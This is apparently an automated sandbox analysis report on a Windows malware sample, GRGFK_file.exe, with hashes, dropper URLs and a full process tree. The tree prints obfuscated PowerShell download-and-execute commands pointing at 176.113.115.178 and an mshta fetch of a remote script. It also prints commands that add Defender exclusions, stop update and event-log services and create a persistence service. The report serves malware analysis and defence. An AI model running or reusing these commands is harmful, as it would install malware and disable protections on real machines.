Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2024 19:28

General

  • Target

    GRGFK_file.exe

  • Size

    50KB

  • MD5

    666248c216a3f63828f739839230f9f6

  • SHA1

    13690837235053762a538b4c5b2b601ec9f6bb22

  • SHA256

    00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da

  • SHA512

    37e57468a080dbb33ee480ae63d80939ff06050035f168630ba1d8e220e1b4859f78f897a12ba83a514bc97ed7927ee01c6fcca67fbaf479294a529302f7bdde

  • SSDEEP

    768:CT6n3V7i+V39HhHw98cje6O7UgYWE8knmbN8vnoK:7i+/BHw98cyoWE8ks8vnp

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Language
hta
Source
URLs
hta.dropper

http://176.113.115.178/Windows-Update

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/1.png

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Sets service image path in registry 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Loads dropped DLL 2 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:420
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
      • Sets service image path in registry
      • Loads dropped DLL
      • Suspicious behavior: LoadsDriver
      • Suspicious use of AdjustPrivilegeToken
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch
        2⤵
          PID:584
          • C:\Windows\system32\wbem\wmiprvse.exe
            C:\Windows\system32\wbem\wmiprvse.exe
            3⤵
              PID:1248
            • C:\Windows\system32\DllHost.exe
              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
              3⤵
                PID:1556
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                3⤵
                • Checks processor information in registry
                PID:1308
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k RPCSS
              2⤵
                PID:664
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                2⤵
                • Modifies security service
                • Indicator Removal: Clear Windows Event Logs
                PID:748
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                2⤵
                  PID:792
                  • C:\Windows\system32\Dwm.exe
                    "C:\Windows\system32\Dwm.exe"
                    3⤵
                      PID:1160
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs
                    2⤵
                    • Drops file in Windows directory
                    • Suspicious use of AdjustPrivilegeToken
                    PID:832
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService
                    2⤵
                      PID:972
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k NetworkService
                      2⤵
                        PID:268
                      • C:\Windows\System32\spoolsv.exe
                        C:\Windows\System32\spoolsv.exe
                        2⤵
                          PID:108
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                          2⤵
                            PID:1056
                          • C:\Windows\system32\taskhost.exe
                            "taskhost.exe"
                            2⤵
                              PID:1092
                            • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                              "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                              2⤵
                                PID:1240
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                2⤵
                                  PID:3052
                                • C:\Windows\system32\sppsvc.exe
                                  C:\Windows\system32\sppsvc.exe
                                  2⤵
                                    PID:2208
                                  • C:\ProgramData\Mig\Mig.exe
                                    C:\ProgramData\Mig\Mig.exe
                                    2⤵
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Drops file in System32 directory
                                    • Suspicious use of SetThreadContext
                                    PID:1924
                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                      3⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2616
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                      3⤵
                                        PID:1620
                                        • C:\Windows\system32\wusa.exe
                                          wusa /uninstall /kb:890830 /quiet /norestart
                                          4⤵
                                          • Drops file in Windows directory
                                          PID:3004
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop UsoSvc
                                        3⤵
                                        • Launches sc.exe
                                        PID:1484
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                        3⤵
                                        • Launches sc.exe
                                        PID:1668
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop wuauserv
                                        3⤵
                                        • Launches sc.exe
                                        PID:2060
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop bits
                                        3⤵
                                        • Launches sc.exe
                                        PID:2572
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop dosvc
                                        3⤵
                                        • Launches sc.exe
                                        PID:1992
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1148
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2524
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1732
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3064
                                      • C:\Windows\system32\dialer.exe
                                        C:\Windows\system32\dialer.exe
                                        3⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2748
                                      • C:\Windows\system32\dialer.exe
                                        C:\Windows\system32\dialer.exe
                                        3⤵
                                          PID:1460
                                        • C:\Windows\system32\dialer.exe
                                          dialer.exe
                                          3⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1688
                                    • C:\Windows\system32\lsass.exe
                                      C:\Windows\system32\lsass.exe
                                      1⤵
                                        PID:476
                                      • C:\Windows\system32\lsm.exe
                                        C:\Windows\system32\lsm.exe
                                        1⤵
                                          PID:484
                                        • C:\Windows\Explorer.EXE
                                          C:\Windows\Explorer.EXE
                                          1⤵
                                            PID:1188
                                            • C:\Users\Admin\AppData\Local\Temp\GRGFK_file.exe
                                              "C:\Users\Admin\AppData\Local\Temp\GRGFK_file.exe"
                                              2⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:2740
                                              • C:\Windows\system32\wscript.exe
                                                "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
                                                3⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:2180
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                  4⤵
                                                  • Blocklisted process makes network request
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2216
                                                  • C:\Windows\System32\WScript.exe
                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
                                                    5⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1328
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
                                                      6⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2112
                                                      • C:\Windows\system32\mshta.exe
                                                        mshta http://176.113.115.178/Windows-Update
                                                        7⤵
                                                        • Blocklisted process makes network request
                                                        • Modifies Internet Explorer settings
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2604
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                          8⤵
                                                          • UAC bypass
                                                          • Blocklisted process makes network request
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Loads dropped DLL
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:2992
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                                                            9⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2100
                                                          • C:\Users\Admin\AppData\Roaming\LB31.exe
                                                            "C:\Users\Admin\AppData\Roaming\LB31.exe"
                                                            9⤵
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Drops file in System32 directory
                                                            • Suspicious use of SetThreadContext
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:2500
                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                              10⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Drops file in System32 directory
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:536
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                              10⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:1772
                                                              • C:\Windows\system32\wusa.exe
                                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                                11⤵
                                                                • Drops file in Windows directory
                                                                PID:1852
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe stop UsoSvc
                                                              10⤵
                                                              • Launches sc.exe
                                                              PID:2556
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                              10⤵
                                                              • Launches sc.exe
                                                              PID:1464
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe stop wuauserv
                                                              10⤵
                                                              • Launches sc.exe
                                                              PID:1516
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe stop bits
                                                              10⤵
                                                              • Launches sc.exe
                                                              PID:2240
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe stop dosvc
                                                              10⤵
                                                              • Launches sc.exe
                                                              PID:1732
                                                            • C:\Windows\system32\powercfg.exe
                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                              10⤵
                                                              • Power Settings
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2308
                                                            • C:\Windows\system32\powercfg.exe
                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                              10⤵
                                                              • Power Settings
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1000
                                                            • C:\Windows\system32\powercfg.exe
                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                              10⤵
                                                              • Power Settings
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2220
                                                            • C:\Windows\system32\powercfg.exe
                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                              10⤵
                                                              • Power Settings
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1808
                                                            • C:\Windows\system32\dialer.exe
                                                              C:\Windows\system32\dialer.exe
                                                              10⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:2364
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe delete "LIB"
                                                              10⤵
                                                              • Launches sc.exe
                                                              PID:828
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
                                                              10⤵
                                                              • Launches sc.exe
                                                              PID:2864
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe stop eventlog
                                                              10⤵
                                                              • Launches sc.exe
                                                              PID:2596
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe start "LIB"
                                                              10⤵
                                                              • Launches sc.exe
                                                              PID:764
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                  4⤵
                                                  • Blocklisted process makes network request
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2792
                                                  • C:\Windows\system32\ipconfig.exe
                                                    "C:\Windows\system32\ipconfig.exe" /flushdns
                                                    5⤵
                                                    • Gathers network information
                                                    PID:1184
                                          • C:\Windows\system32\conhost.exe
                                            \??\C:\Windows\system32\conhost.exe "-1463656723-12037832271375791712-1719969907-128515087815619622191225824747-714110569"
                                            1⤵
                                              PID:1008
                                            • C:\Windows\system32\conhost.exe
                                              \??\C:\Windows\system32\conhost.exe "1333915259-201644137-1349261997-202822913-20977509436460638071617653043-1987054942"
                                              1⤵
                                                PID:2300
                                              • C:\Windows\system32\conhost.exe
                                                \??\C:\Windows\system32\conhost.exe "89760424-186423312820512836551418197283-1425630810-459205018-1052829380-1041742962"
                                                1⤵
                                                  PID:1144
                                                • C:\Windows\system32\conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe "-20293896641749908370-780152221-644883210-12033539951207882993743045538225622009"
                                                  1⤵
                                                    PID:684
                                                  • C:\Windows\system32\conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe "1984615712-1491325827-15327395081715404796-712188399-1769727858-219468611936848006"
                                                    1⤵
                                                      PID:1956
                                                    • C:\Windows\system32\conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe "-1538620181-1469423296-680882974-1621524646782879392043527163-3345402371914856762"
                                                      1⤵
                                                        PID:2896
                                                      • C:\Windows\system32\conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe "1023051173146739254325588472352200844-1496774744-14437288121224247846263119403"
                                                        1⤵
                                                          PID:2084
                                                        • C:\Windows\system32\conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe "-410035441-1018883342-8824685751314294388295216285-1640786181-1427074815-901970902"
                                                          1⤵
                                                            PID:2416
                                                          • C:\Windows\system32\conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe "-497091244-9545217638141909811887255779-1679342481-457780748-1308030546-1120567084"
                                                            1⤵
                                                              PID:3028
                                                            • C:\Windows\system32\conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe "-8361324132043302237-1003581835-29305580917448850071248082489300867220-288399109"
                                                              1⤵
                                                                PID:3020
                                                              • C:\Windows\system32\conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe "6019725522005972619670937324-27617462667290017817155526371375080430-225788482"
                                                                1⤵
                                                                  PID:1572
                                                                • C:\Windows\system32\conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe "-12472066231538050732-2858974501421646566-281458830-2364565652041613213167332214"
                                                                  1⤵
                                                                    PID:1748
                                                                  • C:\Windows\system32\conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe "-2096073850-1586433695491250960373028899-1159041196109397124418499533631792811781"
                                                                    1⤵
                                                                      PID:2716
                                                                    • C:\Windows\system32\conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe "-1113635036-111208484612267171475469608061205858553-1743439475263058315-152023611"
                                                                      1⤵
                                                                        PID:788
                                                                      • C:\Windows\system32\conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe "606033159767851553-15407154281672805840-1427479312-719019308-375627363-1255523014"
                                                                        1⤵
                                                                          PID:868

                                                                        Network

                                                                        MITRE ATT&CK Enterprise v15

                                                                        Replay Monitor

                                                                        Loading Replay Monitor...

                                                                        Downloads

                                                                        • C:\Users\Admin\AppData\Local\Temp\tempScript.js

                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          82f229d0c36b68073da70ef5958e425d

                                                                          SHA1

                                                                          2beb8cd227b49b1d119165d6e3d258ddb730387a

                                                                          SHA256

                                                                          0f2579fdb9cbaaec15015df17dbaafd73a9d7d3202321aba6a1c8479cac17394

                                                                          SHA512

                                                                          4553f11b61e2c1cb1ebf532e7417380a8a5c19121331b76894bf5d3605a905fa3f62b54d596a818709f28c49fd7eb1d880798907a84cac45ccff65ee93f9e970

                                                                        • C:\Users\Admin\AppData\Roaming\CMD.vbs

                                                                          Filesize

                                                                          27KB

                                                                          MD5

                                                                          238ec4d17050e1841e8e0171407c2260

                                                                          SHA1

                                                                          2c8c14b257641f1e1151c6303dabde01621314f2

                                                                          SHA256

                                                                          163c4066da47b2e8b7d3690a374c79856417de2e09c74c0e7c807cd0b5c4b8fb

                                                                          SHA512

                                                                          3eaa1ebca8b9ad021342846040faf19c5ef420c319a9a649b31ffb9107b54d71f60f6e4372e0256f123b931f5c3dd11a34ad9c4ccb7d0a3c687a90ba50cd2102

                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                          Filesize

                                                                          7KB

                                                                          MD5

                                                                          c5fe27e707b9c30f1fce30f6c6f6518d

                                                                          SHA1

                                                                          285c89298322e4e090aab27fcb4ab55ae33a4c1b

                                                                          SHA256

                                                                          4002566a6ad04a94fefe404275a354018461724d8bdd0d3b3abb745770fd1c6e

                                                                          SHA512

                                                                          5279c8a1a76d3be45d132015cd3ce3c9598fe80bfe791a7b272aead346db56b9e6be0db4fea732b05571fb67cdab84b8b6de380395de83d533576b64871ea971

                                                                        • \Users\Admin\AppData\Roaming\LB31.exe

                                                                          Filesize

                                                                          7.3MB

                                                                          MD5

                                                                          c9e6aa21979d5fc710f1f2e8226d9dfe

                                                                          SHA1

                                                                          d881f97a1fe03f43bed2a9609eae65531cf710cf

                                                                          SHA256

                                                                          a1a8cfcc74f8f96fd09115189defe07ac6fc2e85a9ff3b3ec9c6f454aede1c1d

                                                                          SHA512

                                                                          9e90bcb64b0e1f03e05990cdead076b4c6e0b050932ecb953dae50b7e92b823a80fc66d1fd8753591719e89b405757b2bf7518814bc6a19bb745124d1a691627

                                                                        • memory/420-63-0x0000000000180000-0x00000000001A4000-memory.dmp

                                                                          Filesize

                                                                          144KB

                                                                        • memory/420-65-0x000007FEBFC50000-0x000007FEBFC60000-memory.dmp

                                                                          Filesize

                                                                          64KB

                                                                        • memory/420-66-0x0000000037CB0000-0x0000000037CC0000-memory.dmp

                                                                          Filesize

                                                                          64KB

                                                                        • memory/420-64-0x00000000001B0000-0x00000000001DB000-memory.dmp

                                                                          Filesize

                                                                          172KB

                                                                        • memory/420-61-0x0000000000180000-0x00000000001A4000-memory.dmp

                                                                          Filesize

                                                                          144KB

                                                                        • memory/468-666-0x000000013F380000-0x000000013FE7F000-memory.dmp

                                                                          Filesize

                                                                          11.0MB

                                                                        • memory/468-363-0x000000013F380000-0x000000013FE7F000-memory.dmp

                                                                          Filesize

                                                                          11.0MB

                                                                        • memory/468-71-0x00000000000A0000-0x00000000000CB000-memory.dmp

                                                                          Filesize

                                                                          172KB

                                                                        • memory/476-75-0x00000000000E0000-0x000000000010B000-memory.dmp

                                                                          Filesize

                                                                          172KB

                                                                        • memory/536-48-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

                                                                          Filesize

                                                                          2.9MB

                                                                        • memory/536-49-0x0000000002420000-0x0000000002428000-memory.dmp

                                                                          Filesize

                                                                          32KB

                                                                        • memory/1924-483-0x000000013F380000-0x000000013FE7F000-memory.dmp

                                                                          Filesize

                                                                          11.0MB

                                                                        • memory/1924-365-0x000000013F380000-0x000000013FE7F000-memory.dmp

                                                                          Filesize

                                                                          11.0MB

                                                                        • memory/2216-17-0x0000000002460000-0x0000000002468000-memory.dmp

                                                                          Filesize

                                                                          32KB

                                                                        • memory/2216-16-0x000000001B210000-0x000000001B4F2000-memory.dmp

                                                                          Filesize

                                                                          2.9MB

                                                                        • memory/2364-51-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                          Filesize

                                                                          172KB

                                                                        • memory/2364-57-0x0000000077B50000-0x0000000077C6F000-memory.dmp

                                                                          Filesize

                                                                          1.1MB

                                                                        • memory/2364-56-0x0000000077C70000-0x0000000077E19000-memory.dmp

                                                                          Filesize

                                                                          1.7MB

                                                                        • memory/2364-58-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                          Filesize

                                                                          172KB

                                                                        • memory/2364-55-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                          Filesize

                                                                          172KB

                                                                        • memory/2364-50-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                          Filesize

                                                                          172KB

                                                                        • memory/2364-53-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                          Filesize

                                                                          172KB

                                                                        • memory/2364-52-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                          Filesize

                                                                          172KB

                                                                        • memory/2500-333-0x000000013FDE0000-0x00000001408DF000-memory.dmp

                                                                          Filesize

                                                                          11.0MB

                                                                        • memory/2500-42-0x000000013FDE0000-0x00000001408DF000-memory.dmp

                                                                          Filesize

                                                                          11.0MB

                                                                        • memory/2740-2-0x0000000000450000-0x0000000000456000-memory.dmp

                                                                          Filesize

                                                                          24KB

                                                                        • memory/2740-5-0x000007FEF6500000-0x000007FEF6EEC000-memory.dmp

                                                                          Filesize

                                                                          9.9MB

                                                                        • memory/2740-10-0x000007FEF6500000-0x000007FEF6EEC000-memory.dmp

                                                                          Filesize

                                                                          9.9MB

                                                                        • memory/2740-0-0x000007FEF6503000-0x000007FEF6504000-memory.dmp

                                                                          Filesize

                                                                          4KB

                                                                        • memory/2740-1-0x00000000011D0000-0x00000000011E2000-memory.dmp

                                                                          Filesize

                                                                          72KB

                                                                        • memory/2792-35-0x0000000002960000-0x000000000297A000-memory.dmp

                                                                          Filesize

                                                                          104KB

                                                                        • memory/2992-41-0x000000013FDE0000-0x00000001408DF000-memory.dmp

                                                                          Filesize

                                                                          11.0MB